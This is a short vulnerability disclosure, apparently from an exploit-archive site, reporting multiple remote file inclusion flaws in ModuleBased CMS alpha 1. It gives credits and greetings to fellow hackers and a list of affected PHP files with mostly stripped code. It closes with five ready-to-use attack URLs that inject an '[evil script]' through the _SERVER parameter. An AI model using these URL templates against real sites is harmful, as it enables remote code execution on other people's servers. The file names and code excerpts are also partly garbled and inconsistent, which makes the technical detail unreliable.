+ModuleBased CMS(MBCMS) multiple remote file Inclusion +discripton:MBCMS (ModuleBased CMS) is a new CMS designed for ease of use and customability. It is designed +for PHP/MySQL and it is easy to write new modules or templates to suit a particular website. +version:alfa 1 +vendor site:http://sourceforge.net/projects/mbcms/ + +discovered by: ScorpinO +location:IRAN/ANZALI +sites: WwW.ScorpinO.NeT Www.deltahacking.iR +email:amir.scorpino@yahoo.com +special tnx to:Dr.trojan,HIV++,D_7J,Vampire,...... + +discovered in avatar.php archive.class.php login.php profile.class.php process.php + + /admin/avatar.php +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ /libs/archive.class.php +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ /libs/login.php login($_POST['username'], $_POST['pass']); } ?> +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ /libs/profiles.class.php +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ /libs/profile/proccess.php +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +exploit: + +http://www.example.com/[mbcms]/admin/avatar.php?_SERVER=[evil script] +http://www.example.com/[mbcms]/libs/archive.class.php?_SERVER=[evil script] +http://www.example.com/[mbcms]/libs/login.php?_SERVER=[evil script] +http://www.example.com/[mbcms]/libs/profile.class.php?_SERVER=[evil script] +http://www.example.com/[mbcms]/libs/profile/process.php?_SERVER=[evil script] ++